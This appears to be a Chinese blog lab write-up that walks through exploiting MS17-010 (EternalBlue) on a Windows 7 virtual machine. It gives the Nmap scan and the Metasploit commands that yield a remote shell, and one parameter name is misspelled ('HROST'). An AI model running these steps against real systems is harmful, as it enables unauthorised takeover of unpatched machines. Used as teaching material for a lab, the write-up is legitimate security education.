基於MS17_010(永恆之藍)的一次滲透測試

工具和環境:

  • Nmap端口掃描器
  • Metasploit漏洞檢測工具
  • Kali Linux(前面的兩樣工具都在Kali Linux中有集成,是攻擊機)
  • Windows 7(作爲被攻擊機,IP地址爲:192.168.229.134)
  • VMware虛擬機

1. 打開Kali Linux的命令行輸入框,在命令行中輸入 "nmap -sV 192.168.229.134"掃描Windows7(被攻擊機)開放的端口以及其餘相關信息

掃描端口信息

2. 可以看到,被攻擊機的 445 端口是開放的,由此可以判斷可以基於MS17_010進行"永恆之藍攻擊"

3. 輸入"msfconsole"進入 Metasploit 命令行操作

在這裏插入圖片描述

4. 輸入 “search ms17_010” 搜索與該漏洞相關的代碼庫 (注:auxiliary開頭的代碼是輔助功能代碼;exploit開頭的是我們將要使用的滲透代碼)

在這裏插入圖片描述

5. 輸入 “use exploit/windows/smb/ms17_010_eternalblue” 調用該滲透代碼

在這裏插入圖片描述

6. 輸入 “show options” 查看該代碼可以使用的參數,爲後面設置某些參數做參考

在這裏插入圖片描述

7. 輸入 "set HROST 192.168.229.134"設置攻擊對象的IP地址,本實驗中就是把該參數設爲Windows 7的IP地址

在這裏插入圖片描述

8. 輸入 “exploit”,就是把上面設置好參數的代碼注入給被攻擊機(Windows 7)進行滲透,最後可以獲取到Windows 7的控制權,返回了Windows 7的shell界面,在上面可以進行命令行的操作,攻擊成功

在這裏插入圖片描述
注:不同的主機攻擊效果可能不同,本實驗還有一種攻擊結果是被攻擊機藍屏

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章